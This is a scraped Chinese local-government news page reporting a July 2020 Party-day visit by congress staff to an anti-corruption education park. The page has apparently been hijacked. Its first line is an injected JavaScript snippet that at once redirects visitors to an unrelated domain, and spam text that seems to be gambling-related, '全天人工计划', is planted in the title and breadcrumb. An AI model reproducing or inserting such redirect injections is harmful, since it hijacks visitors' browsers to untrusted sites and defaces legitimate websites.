function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新党的建设  >>  主题党日  
市人大常委会机关党委开展庆“七一”主题党日活动
来源: 市人大常委会机关党委      日期: 2020-07-01      作者: 徐晓颖      点击数:

市人大常委会机关党委开展庆“七一”主题党日活动

为深入学习宣传贯彻习近平新时代中国特色社会主义思想,大力营造风清气正的文化氛围,市人大常委会机关党委在建党99周年之际,开展参观省廉政教育基地迎宾湖丝路廉洁文化主题公园“七一”主题党日活动。7月1日上午,市人大常委会机关党支部和市人大常委会离退休党支部党员,来到了省廉政教育基地迎宾湖丝路廉洁文化主题公园,党员们参观了新时代新思想、清风诗韵、时代精神、丝路文化、当代勤廉楷模、古代清廉典范、环湖文化长廊等七个主题板块,认真聆听了讲解员的讲解。

       参观结束后,广大党员纷纷表示,通过廉政文化的学习,进一步增强了光荣感、使命感。“打铁还需自身硬”,在今后的工作中,要不断加强学习,筑牢不敢腐、不能腐、不想腐的思想根基,永葆初心,做好“三个表率”,建设让党中央放心、让人民群众满意的模范机关。